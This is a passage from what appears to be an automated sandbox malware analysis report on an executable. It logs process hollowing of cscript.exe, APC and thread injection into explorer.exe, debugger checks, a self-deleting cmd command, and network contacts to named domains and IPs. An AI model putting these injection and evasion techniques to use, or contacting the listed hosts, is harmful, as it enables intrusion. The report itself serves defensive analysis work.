            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988A62 mov eax, dword ptr fs:[00000030h]9_2_04988A62
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]9_2_048DAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]9_2_048DAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]9_2_048DAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]9_2_048DAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DAE73 mov eax, dword ptr fs:[00000030h]9_2_048DAE73
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]9_2_048C1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C1B8F mov eax, dword ptr fs:[00000030h]9_2_048C1B8F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]9_2_04937794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]9_2_04937794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937794 mov eax, dword ptr fs:[00000030h]9_2_04937794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496D380 mov ecx, dword ptr fs:[00000030h]9_2_0496D380
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C8794 mov eax, dword ptr fs:[00000030h]9_2_048C8794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0497138A mov eax, dword ptr fs:[00000030h]9_2_0497138A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EB390 mov eax, dword ptr fs:[00000030h]9_2_048EB390
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04985BA5 mov eax, dword ptr fs:[00000030h]9_2_04985BA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F37F5 mov eax, dword ptr fs:[00000030h]9_2_048F37F5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]9_2_048EA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA70E mov eax, dword ptr fs:[00000030h]9_2_048EA70E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]9_2_0494FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FF10 mov eax, dword ptr fs:[00000030h]9_2_0494FF10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0497131B mov eax, dword ptr fs:[00000030h]9_2_0497131B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]9_2_0498070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498070D mov eax, dword ptr fs:[00000030h]9_2_0498070D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DF716 mov eax, dword ptr fs:[00000030h]9_2_048DF716
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]9_2_048B4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B4F2E mov eax, dword ptr fs:[00000030h]9_2_048B4F2E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EE730 mov eax, dword ptr fs:[00000030h]9_2_048EE730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988B58 mov eax, dword ptr fs:[00000030h]9_2_04988B58
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BDB40 mov eax, dword ptr fs:[00000030h]9_2_048BDB40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CEF40 mov eax, dword ptr fs:[00000030h]9_2_048CEF40
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BF358 mov eax, dword ptr fs:[00000030h]9_2_048BF358
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BDB60 mov ecx, dword ptr fs:[00000030h]9_2_048BDB60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CFF60 mov eax, dword ptr fs:[00000030h]9_2_048CFF60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988F6A mov eax, dword ptr fs:[00000030h]9_2_04988F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]9_2_048E3B7A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E3B7A mov eax, dword ptr fs:[00000030h]9_2_048E3B7A
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0040ACC0 LdrLoadDll,5_2_0040ACC0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.dorotajedrusik.com
            Source: C:\Windows\explorer.exeDomain query: www.noseainsight.com
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1C0000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeMemory written: C:\Users\user\Desktop\z7d1ehQQQW.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'Jump to behavior
            Source: explorer.exe, 00000006.00000000.676817795.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000000.762191972.0000000001080000.00000002.00020000.sdmp, cscript.exe, 00000009.00000002.917987042.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Users\user\Desktop\z7d1ehQQQW.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
